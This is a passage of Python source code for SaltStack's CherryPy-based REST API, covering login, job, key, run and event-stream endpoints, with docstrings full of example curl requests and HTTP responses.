'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, collections.Mapping):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
cherrypy.tools.html_override = cherrypy.Tool('on_start_resource',
html_override_tool, priority=53)
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.cors_tool = cherrypy.Tool('before_request_body',
cors_tool, priority=50)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if cherrypy.session.get('user'):
chunk['__current_eauth_user'] = cherrypy.session.get('user')
if cherrypy.session.get('groups'):
chunk['__current_eauth_groups'] = cherrypy.session.get('groups')
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.list_job' if jid else 'jobs.list_jobs',
'jid': jid,
}]
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
ret['info'] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get('Result')
for minion in returns:
if u'return' in returns[minion]:
minion_ret[minion] = returns[minion].get(u'return')
else:
minion_ret[minion] = returns[minion].get('return')
ret['return'] = [minion_ret]
else:
ret['return'] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
@cherrypy.config(**{'tools.salt_token.on': True})
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = six.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, six.StringIO(pub_key))
tarball.addfile(priv_key_file, six.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
cherrypy.session['user'] = token['name']
if 'groups' in token:
cherrypy.session['groups'] = token['groups']
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
if token['eauth'] == 'django' and '^model' in eauth:
perms = token['auth_list']
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups']:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception:
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
perms = None
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms or {},
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
salt-api does not enforce authorization, Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>` Other than that this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of :term:`lowstate` data describing Salt commands must be
sent in the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run enpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instad,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronity into account when designing an application. Below are some
general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript appliction is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
